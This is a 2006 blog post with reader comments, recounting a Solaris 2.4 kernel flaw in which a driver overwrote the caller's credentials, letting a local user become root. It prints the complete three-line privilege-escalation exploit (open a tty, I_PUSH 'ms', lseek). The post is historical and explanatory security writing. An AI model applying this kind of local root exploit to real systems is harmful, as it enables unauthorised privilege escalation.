This Old Vulnerability, Memento Style

Dave G. | April 3rd, 2006 | Filed Under: This Old Vulnerability

They bang the gong for this one! I am going to tell the story of this Solaris 2.4 kernel vulnerability in reverse order.

First lets look at the comment from the exploit:

/* If a tty port that is writeable by the user and owned by root is opened and the I_PUSH “ms” ioctl call made followed by an lseek the effective uid of the user is changed to root. */

I think I just dumped core.

Lets see what the folks on bugtraq had to say. Consolidating Casper Dik and jsz we get:

The problem is that the code uses and changes the user’s cred structure, instead of allocating a new one (which is what happens in Solaris 2.2 and earlier). … But seriously, as someone has already said, the bug is in one of the routines of the driver in the kernel, which passes a pointer to u-cred structure and the routine actually modifies the uid and gid (euid & egid as well) to zero.

Finally, lets look at the three line kernel exploit:

fd = open("/dev/ttyb", O_RDWR);
ioctl(fd, I_PUSH, "ms");
lseek(fd, 0, 1);

2 Comments so far

  • blog

    April 8th, 2006 11:15 pm

    Dang. I don’t remember that one (and it’s a good one!). Then again, they were coming fast and furious back then. Glad I waited until 2.6. :^)
    Chris Walsh | 04.03.06 - 2:34 pm | #

    I thought Cliff showed me this one in his office in sept 1994, there were several such found by Brad Powell and others during this time period internal to Sunsoft and industrial relations groups. I was in the process of linting the 2.4 sources that summer of 1994 when I was first hired into Internet architecture at Sun. Most of them tended to be exercised by writing code in the debugger and running that.

    Fun times, brings back a lot of memorys.. including cliff’s packet gen program, Steve Sparkers Packet shell in tcl and other fun stuff.
    All of which we used to “strengthen” the 2.4-2.5 series of kernels against the attacks coming online(BTW Sumitomo ran an older version of SUNOS with buggy sequence number gen)(md5 as a source of sequence numbers was introduced in 2.4-2.5(Bob Gilligans preference, my first choice was BBS(Blub Blub Shum(check “Applied Crypto”(nowadays I would look at whirlpool hashs)))

    an old sunsoft kid
    someone from that era at build | 04.07.06 - 6:40 pm | #

  • tqbf

    April 9th, 2006 1:25 pm

    Packet shell inspired CAPE, which was the precursor for CASL. I think Steve actually got it right with the Tcl extension, because I write packet code in Python all the time now and can count on zero fingers the number of times I’ve used CASL in the last year.

    Did Brad Powell actually find bugs? I had him pegged as a sort of liason type.

    • Leave a reply